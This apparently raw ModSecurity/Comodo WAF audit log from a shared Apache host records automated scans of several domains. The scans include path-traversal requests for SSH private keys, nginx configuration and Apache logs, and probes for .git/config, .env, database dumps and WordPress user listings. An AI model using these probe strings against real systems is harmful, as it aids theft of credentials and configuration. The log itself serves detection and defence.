X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fee7c216-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2014 11:29:50 GMT ETag: "3bf-4feeec6556780" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --fee7c216-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||itilebanon.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||itilebanon.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "itilebanon.com"] [uri "/..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\var/log/apache2/access.log"] [unique_id "aIJIm0Q7UIwkHXYqnpy03wAAAAM"] Stopwatch: 1753368731782211 4851 (- - -) Stopwatch2: 1753368731782211 4851; combined=3049, p1=517, p2=2427, p3=0, p4=0, p5=105, sr=163, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fee7c216-Z-- --c88d054b-A-- [24/Jul/2025:17:52:11.976298 +0300] aIJIm_FbyHsjieS2RGAnJQAAANA 185.177.72.144 49840 127.0.0.1 7081 --c88d054b-B-- GET /database.sql HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c88d054b-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2014 11:29:50 GMT ETag: "3bf-4feeec6556780" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --c88d054b-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||itilebanon.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||itilebanon.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "itilebanon.com"] [uri "/database.sql"] [unique_id "aIJIm_FbyHsjieS2RGAnJQAAANA"] Stopwatch: 1753368731971414 4971 (- - -) Stopwatch2: 1753368731971414 4971; combined=2863, p1=562, p2=2218, p3=0, p4=0, p5=83, sr=169, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c88d054b-Z-- --d1483f66-A-- [24/Jul/2025:17:52:12.482716 +0300] aIJInPFbyHsjieS2RGAnLgAAAMQ 185.177.72.144 49972 127.0.0.1 7081 --d1483f66-B-- GET /?config=../../../../home/user/.ssh/id_rsa HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d1483f66-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.23 Expires: Tue, 01 Jan 2000 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2025 14:52:12 GMT Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 186 Content-Type: text/html; charset=UTF-8 --d1483f66-E-- <title>Welcome to Jinan University System </title> <head> </head> <body> <div id="container"> <div id="photo"> </div> <div id="logo"> </div> <div id="main"> <div id="position"><h3 align="center">Welcome to Jinan University System</h3></div> <br><br> </div> <br> </div> </div> </body> --d1483f66-H-- Message: Warning. Matched phrase ".ssh/id_rsa" at ARGS:config. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||itilebanon.com|F|2"] [data "Matched Data: .ssh/id_rsa found within ARGS:config: ../../../../home/user/.ssh/id_rsa"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at ARGS:config. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||itilebanon.com|F|2"] [data "Matched Data: .ssh/id_rsa found within ARGS:config: ../../../../home/user/.ssh/id_rsa"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "itilebanon.com"] [uri "/"] [unique_id "aIJInPFbyHsjieS2RGAnLgAAAMQ"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: Undefined variable $title in /var/www/vhosts/itilebanon.com/httpdocs/index.php on line 1' Apache-Handler: proxy:unix:/var/www/vhosts/system/itilebanon.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753368732472235 10633 (- - -) Stopwatch2: 1753368732472235 10633; combined=5380, p1=1219, p2=3866, p3=83, p4=90, p5=121, sr=187, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d1483f66-Z-- --8bc4600d-A-- [24/Jul/2025:17:52:12.548339 +0300] aIJInPFbyHsjieS2RGAnMAAAANc 185.177.72.144 50000 127.0.0.1 7081 --8bc4600d-B-- GET /?path=../../../../etc/nginx/nginx.conf HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8bc4600d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.23 Expires: Tue, 01 Jan 2000 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2025 14:52:12 GMT Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 186 Content-Type: text/html; charset=UTF-8 --8bc4600d-E-- <title>Welcome to Jinan University System </title> <head> </head> <body> <div id="container"> <div id="photo"> </div> <div id="logo"> </div> <div id="main"> <div id="position"><h3 align="center">Welcome to Jinan University System</h3></div> <br><br> </div> <br> </div> </div> </body> --8bc4600d-H-- Message: Warning. Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||itilebanon.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?path=../../../../etc/nginx/nginx.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||itilebanon.com|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:path: ../../../../etc/nginx/nginx.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|itilebanon.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||itilebanon.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?path=../../../../etc/nginx/nginx.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "itilebanon.com"] [uri "/"] [unique_id "aIJInPFbyHsjieS2RGAnMAAAANc"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||itilebanon.com|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:path: ../../../../etc/nginx/nginx.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "itilebanon.com"] [uri "/"] [unique_id "aIJInPFbyHsjieS2RGAnMAAAANc"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: Undefined variable $title in /var/www/vhosts/itilebanon.com/httpdocs/index.php on line 1' Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|itilebanon.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "itilebanon.com"] [uri "/index.php"] [unique_id "aIJInPFbyHsjieS2RGAnMAAAANc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/itilebanon.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753368732541409 7011 (- - -) Stopwatch2: 1753368732541409 7011; combined=3875, p1=575, p2=2988, p3=72, p4=65, p5=175, sr=186, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8bc4600d-Z-- --2b994f32-A-- [24/Jul/2025:17:52:23.676987 +0300] aIJIp_FbyHsjieS2RGAnUQAAAMg 93.123.109.64 47582 127.0.0.1 7081 --2b994f32-B-- GET /.git/config HTTP/1.0 Host: vivacetrading.com X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --2b994f32-F-- HTTP/1.1 200 OK Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 586 Content-Type: text/html; charset=UTF-8 --2b994f32-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "vivacetrading.com"] [uri "/.git/config"] [unique_id "aIJIp_FbyHsjieS2RGAnUQAAAMg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/vivacetrading.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753368743640680 36420 (- - -) Stopwatch2: 1753368743640680 36420; combined=3771, p1=741, p2=2871, p3=0, p4=0, p5=158, sr=164, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2b994f32-Z-- --9c012c2c-A-- [24/Jul/2025:18:19:41.722361 +0300] aIJPDfFbyHsjieS2RGBK4gAAAMw 146.190.98.228 48054 127.0.0.1 7081 --9c012c2c-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: riyadhchocolate.com X-Real-IP: 146.190.98.228 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --9c012c2c-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 27 Mar 2025 00:51:10 GMT ETag: "328-631485999ce56" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --9c012c2c-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||riyadhchocolate.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||riyadhchocolate.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "riyadhchocolate.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aIJPDfFbyHsjieS2RGBK4gAAAMw"] Stopwatch: 1753370381717351 5136 (- - -) Stopwatch2: 1753370381717351 5136; combined=3113, p1=566, p2=2477, p3=0, p4=0, p5=70, sr=230, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9c012c2c-Z-- --274f574e-A-- [24/Jul/2025:18:23:18.972182 +0300] aIJP5vFbyHsjieS2RGBRjAAAAMQ 93.123.109.64 38492 127.0.0.1 7081 --274f574e-B-- GET /.git/config HTTP/1.0 Host: test.kime.agency X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; Android 11; DN2101) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --274f574e-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 25 Jan 2023 19:33:35 GMT ETag: "328-5f31bb5588323" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --274f574e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.kime.agency"] [uri "/.git/config"] [unique_id "aIJP5vFbyHsjieS2RGBRjAAAAMQ"] Stopwatch: 1753370598967503 4797 (- - -) Stopwatch2: 1753370598967503 4797; combined=3134, p1=506, p2=2529, p3=0, p4=0, p5=99, sr=153, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --274f574e-Z-- --f619b364-A-- [24/Jul/2025:18:40:47.662738 +0300] aIJT_0Q7UIwkHXYqnpzVjgAAAAo 213.209.143.116 41962 127.0.0.1 7081 --f619b364-B-- GET /.env HTTP/1.0 Host: crm.raqmix.net X-Real-IP: 213.209.143.116 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 accept-encoding: gzip --f619b364-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Set-Cookie: csrf_cookie_name=47ce28a031d09e645523b294de643845; expires=Thu, 24 Jul 2025 16:41:47 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --f619b364-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "crm.raqmix.net"] [uri "/.env"] [unique_id "aIJT_0Q7UIwkHXYqnpzVjgAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/crm.raqmix.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753371647385433 277427 (- - -) Stopwatch2: 1753371647385433 277427; combined=2566, p1=635, p2=1817, p3=0, p4=0, p5=113, sr=178, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f619b364-Z-- --25ab2b69-A-- [24/Jul/2025:18:42:30.554599 +0300] aIJUZvFbyHsjieS2RGBrrwAAANE 198.55.98.216 49244 127.0.0.1 7081 --25ab2b69-B-- GET /.git/config HTTP/1.0 Host: own-dev.com X-Real-IP: 198.55.98.216 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; G8343 Build/47.2.A.10.107; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.111 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/229.1.0.17.118;] Accept-Charset: utf-8 Accept-Encoding: gzip --25ab2b69-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a901a185d5dbd5ee-s.p.ttf>; rel=preload; as="font"; crossorigin=""; type="font/ttf", </own logo.png>; rel=preload; as="image" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Next-Router-Segment-Prefetch,Accept-Encoding Content-Encoding: gzip Upgrade: h2,h2c Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --25ab2b69-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "own-dev.com"] [uri "/.git/config"] [unique_id "aIJUZvFbyHsjieS2RGBrrwAAANE"] Stopwatch: 1753371750521004 33767 (- - -) Stopwatch2: 1753371750521004 33767; combined=2448, p1=495, p2=1770, p3=53, p4=39, p5=91, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --25ab2b69-Z-- --2e4a6478-A-- [24/Jul/2025:18:46:36.566047 +0300] aIJVXPFbyHsjieS2RGBzQQAAAMM 198.55.98.216 57674 127.0.0.1 7081 --2e4a6478-B-- GET /.git/config HTTP/1.0 Host: own-dev.com X-Real-IP: 198.55.98.216 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept-Charset: utf-8 Accept-Encoding: gzip --2e4a6478-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a901a185d5dbd5ee-s.p.ttf>; rel=preload; as="font"; crossorigin=""; type="font/ttf", </own logo.png>; rel=preload; as="image" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Next-Router-Segment-Prefetch,Accept-Encoding Content-Encoding: gzip Upgrade: h2,h2c Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --2e4a6478-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "own-dev.com"] [uri "/.git/config"] [unique_id "aIJVXPFbyHsjieS2RGBzQQAAAMM"] Stopwatch: 1753371996529991 36165 (- - -) Stopwatch2: 1753371996529991 36165; combined=3011, p1=685, p2=2121, p3=66, p4=52, p5=86, sr=238, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2e4a6478-Z-- --b62d4d6e-A-- [24/Jul/2025:18:53:25.667630 +0300] aIJW9fFbyHsjieS2RGB9QwAAANA 195.178.110.68 35538 127.0.0.1 7081 --b62d4d6e-B-- GET /.git/config HTTP/1.0 Host: test.casa-eg.com X-Real-IP: 195.178.110.68 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --b62d4d6e-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 09 Oct 2022 09:06:36 GMT ETag: "328-5ea965c36c41b" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --b62d4d6e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.casa-eg.com"] [uri "/.git/config"] [unique_id "aIJW9fFbyHsjieS2RGB9QwAAANA"] Stopwatch: 1753372405664247 3497 (- - -) Stopwatch2: 1753372405664247 3497; combined=2166, p1=444, p2=1617, p3=0, p4=0, p5=105, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b62d4d6e-Z-- --ac414670-A-- [24/Jul/2025:18:53:26.400595 +0300] aIJW9vFbyHsjieS2RGB9SQAAAMI 195.178.110.68 35616 127.0.0.1 7081 --ac414670-B-- GET /.git/config HTTP/1.0 Host: test.casa-eg.com X-Real-IP: 195.178.110.68 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Referer: http://test.casa-eg.com/.git/config Accept-Encoding: gzip --ac414670-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 09 Oct 2022 09:06:36 GMT ETag: "328-5ea965c36c41b" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --ac414670-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.casa-eg.com"] [uri "/.git/config"] [unique_id "aIJW9vFbyHsjieS2RGB9SQAAAMI"] Stopwatch: 1753372406395503 5180 (- - -) Stopwatch2: 1753372406395503 5180; combined=3413, p1=645, p2=2704, p3=0, p4=0, p5=64, sr=203, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ac414670-Z-- --65331721-A-- [24/Jul/2025:18:53:27.290042 +0300] aIJW90Q7UIwkHXYqnpzfDgAAABI 195.178.110.68 35740 127.0.0.1 7081 --65331721-B-- GET /.git/config HTTP/1.0 Host: test.casa-eg.com X-Real-IP: 195.178.110.68 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --65331721-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 09 Oct 2022 09:06:36 GMT ETag: "328-5ea965c36c41b" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --65331721-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.casa-eg.com"] [uri "/.git/config"] [unique_id "aIJW90Q7UIwkHXYqnpzfDgAAABI"] Stopwatch: 1753372407283351 6809 (- - -) Stopwatch2: 1753372407283351 6809; combined=3661, p1=929, p2=2662, p3=0, p4=0, p5=70, sr=416, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --65331721-Z-- --aca2f846-A-- [24/Jul/2025:18:53:28.200828 +0300] aIJW-EQ7UIwkHXYqnpzfFAAAAAU 195.178.110.68 35824 127.0.0.1 7081 --aca2f846-B-- GET /.git/config HTTP/1.0 Host: test.casa-eg.com X-Real-IP: 195.178.110.68 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Referer: http://test.casa-eg.com/.git/config Accept-Encoding: gzip --aca2f846-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 09 Oct 2022 09:06:36 GMT ETag: "328-5ea965c36c41b" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --aca2f846-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id 